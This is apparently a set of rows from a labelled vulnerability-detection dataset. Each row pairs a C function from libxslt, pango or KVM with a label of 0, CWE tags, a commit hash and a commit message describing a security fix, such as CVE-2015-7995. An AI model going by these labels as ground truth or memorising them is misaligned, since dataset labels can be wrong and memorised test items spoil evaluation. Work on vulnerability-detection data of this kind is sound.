if (parent == NULL) {
if (err) {
xsltTransformError(NULL, style, inst,
"internal problem: element has no parent\n");
style->errors++;
}
return(0);
}
if ((parent->ns == NULL) || (parent->type != XML_ELEMENT_NODE) ||
((parent->ns != inst->ns) &&
(!xmlStrEqual(parent->ns->href, inst->ns->href))) ||
((!xmlStrEqual(parent->name, BAD_CAST "stylesheet")) &&
(!xmlStrEqual(parent->name, BAD_CAST "transform")))) {
if (err) {
xsltTransformError(NULL, style, inst,
"element %s only allowed as child of stylesheet\n",
inst->name);
style->errors++;
}
return(0);
}
return(1);
}
| 0 |
[] |
libxslt
|
7ca19df892ca22d9314e95d59ce2abdeff46b617
| 30,953,478,850,592,280,000,000,000,000,000,000,000 | 29 |
Fix for type confusion in preprocessing attributes
CVE-2015-7995 http://www.openwall.com/lists/oss-security/2015/10/27/10
We need to check that the parent node is an element before dereferencing
its namespace
|
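The underlying bug class here is type confusion on a tagged structure: xmlNodePtr can point at several layouts, and parent->ns is only meaningful when the parent is an element, so the type tag must be checked before the field is read — exactly the added parent->type != XML_ELEMENT_NODE test above. A minimal, hypothetical model of that discipline:

#include <stddef.h>

enum node_type { NODE_ELEMENT, NODE_TEXT };

/* In a tagged union, each field is only valid for certain tags. */
struct node {
    enum node_type type;
    union {
        struct { const char *ns_href; } elem;  /* valid for NODE_ELEMENT */
        struct { const char *content; } text;  /* valid for NODE_TEXT */
    } u;
};

static const char *node_ns_href(const struct node *n)
{
    if (n == NULL || n->type != NODE_ELEMENT)
        return NULL;               /* refuse to read element-only fields */
    return n->u.elem.ns_href;
}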
hb_ot_layout_table_get_script_count (hb_ot_layout_t *layout,
hb_ot_layout_table_type_t table_type)
{
const GSUBGPOS &g = get_gsubgpos_table (layout, table_type);
return g.get_script_count ();
}
| 0 |
[] |
pango
|
336bb3201096bdd0494d29926dd44e8cca8bed26
| 261,130,101,278,912,050,000,000,000,000,000,000,000 | 7 |
[HB] Remove all references to the old code!
|
int kvm_read_guest_atomic(struct kvm *kvm, gpa_t gpa, void *data,
unsigned long len)
{
int r;
unsigned long addr;
gfn_t gfn = gpa >> PAGE_SHIFT;
int offset = offset_in_page(gpa);
addr = gfn_to_hva(kvm, gfn);
if (kvm_is_error_hva(addr))
return -EFAULT;
pagefault_disable();
r = __copy_from_user_inatomic(data, (void __user *)addr + offset, len);
pagefault_enable();
if (r)
return -EFAULT;
return 0;
}
| 0 |
[
"CWE-399"
] |
kvm
|
5b40572ed5f0344b9dbee486a17c589ce1abe1a3
| 335,575,670,320,034,100,000,000,000,000,000,000,000 | 18 |
KVM: Ensure all vcpus are consistent with in-kernel irqchip settings
If some vcpus are created before KVM_CREATE_IRQCHIP, then
irqchip_in_kernel() and vcpu->arch.apic will be inconsistent, leading
to potential NULL pointer dereferences.
Fix by:
- ensuring that no vcpus are installed when KVM_CREATE_IRQCHIP is called
- ensuring that a vcpu has an apic if it is installed after KVM_CREATE_IRQCHIP
This is somewhat long-winded because vcpu->arch.apic is created without
kvm->lock held.
Based on earlier patch by Michael Ellerman.
Signed-off-by: Michael Ellerman <[email protected]>
Signed-off-by: Avi Kivity <[email protected]>
|